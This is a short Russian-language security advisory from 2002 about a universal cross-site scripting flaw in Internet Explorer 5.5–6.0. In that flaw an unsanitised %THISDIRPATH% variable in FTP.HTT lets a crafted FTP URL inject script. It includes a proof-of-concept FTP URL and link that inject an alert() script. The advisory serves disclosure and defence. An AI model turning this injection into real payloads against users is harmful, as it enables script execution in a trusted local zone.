Security Lab

Универсальный cross-site scripting в Microsoft Internet Explorer

Дата публикации:10.06.2002
Всего просмотров:1045
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

В Microsoft Internet Explorer обнаружена возможность универсального межсайтового скриптинга. Данные, включенные в FTP URL, могут интерпретироваться как содержание, позволяя выполнение произвольного JavaScript кода с настройками безопасности для зоны Local Computer context.
Уязвимость происходит при включенном режиме "Folder View for FTP sites" и опции 'Enable Web content in folders' в эксплорере.

Проблема находится в файле FTP.HTT, отвечающем за отображение особенности 'folder view for FTP sites' (%SystemRoot%\WEB\FTP.HTT). В строке:
----------------FTP.HTT--------------------
35: <BASE href="%THISDIRPATH%\">
---------------------------------------
Переменная THISDIRPATH не проверяется перед обработкой.

Пример1:

[ ftp://TARGET ]
'%THISDIRPATH%' = 'ftp://TARGET/'
<BASE href="ftp://TARGET/\">
~~~~~~~~~~~~~
Пример 2:
[ ftp://"><script>alert("Exploit");</script> ]
'%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
<BASE href="ftp://"><script>alert("Exploit");</script>/\">
Эксплоит:
<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0
 

Ссылки: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability